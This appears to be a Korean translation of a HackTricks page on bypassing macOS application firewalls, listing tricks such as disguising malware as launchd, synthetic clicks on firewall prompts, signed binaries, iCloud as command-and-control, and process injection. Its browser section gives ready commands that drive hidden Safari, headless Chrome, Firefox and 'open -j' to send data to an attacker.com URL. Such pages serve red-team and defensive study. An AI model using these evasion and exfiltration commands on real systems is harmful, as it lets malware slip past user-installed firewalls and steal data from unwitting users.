macOS Bypassing Firewalls

htARTE (HackTricks AWS Red Team Expert)를 통해 **제로부터 영웅이 되는 AWS 해킹을 배우세요**!

HackTricks를 지원하는 다른 방법:

발견된 기술

일부 macOS 방화벽 앱에서 작동하는 다음 기술들을 발견했습니다.

화이트리스트 이름 남용

  • 예를 들어 악성 코드를 **launchd**와 같은 잘 알려진 macOS 프로세스 이름으로 부르기

합성 클릭

  • 방화벽이 사용자에게 허가를 요청하면 악성 코드가 허용을 클릭하도록 함

Apple 서명된 이진 파일 사용

  • **curl**과 같은 것뿐만 아니라 **whois**와 같은 다른 이진 파일 사용

잘 알려진 애플 도메인

방화벽이 apple.com 또는 **icloud.com**과 같은 잘 알려진 애플 도메인으로의 연결을 허용할 수 있습니다. 그리고 iCloud를 C2로 사용할 수 있습니다.

일반적인 우회

방화벽 우회를 시도하는 몇 가지 아이디어

허용된 트래픽 확인

허용된 트래픽을 확인하면 잠재적으로 화이트리스트에 등록된 도메인이나 해당 도메인에 액세스할 수 있는 애플리케이션을 식별하는 데 도움이 됩니다.

lsof -i TCP -sTCP:ESTABLISHED

DNS 남용

DNS 해결은 아마도 DNS 서버에 연락할 수 있도록 허용될 것으로 예상되는 mdnsreponder 서명된 애플리케이션을 통해 수행됩니다.

브라우저 앱을 통해

  • oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
  • 구글 크롬

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
  • 파이어폭스

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
  • Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

프로세스 인젝션을 통해

만약 프로세스에 코드를 인젝션할 수 있다면, 어떤 서버에 연결할 수 있는 권한이 있는 프로세스로 방화벽 보호를 우회할 수 있습니다:

pagemacOS Process Abuse

참고 자료

htARTE (HackTricks AWS Red Team Expert)를 통해 제로부터 AWS 해킹을 배우세요 htARTE (HackTricks AWS Red Team Expert)!

HackTricks를 지원하는 다른 방법:

Last updated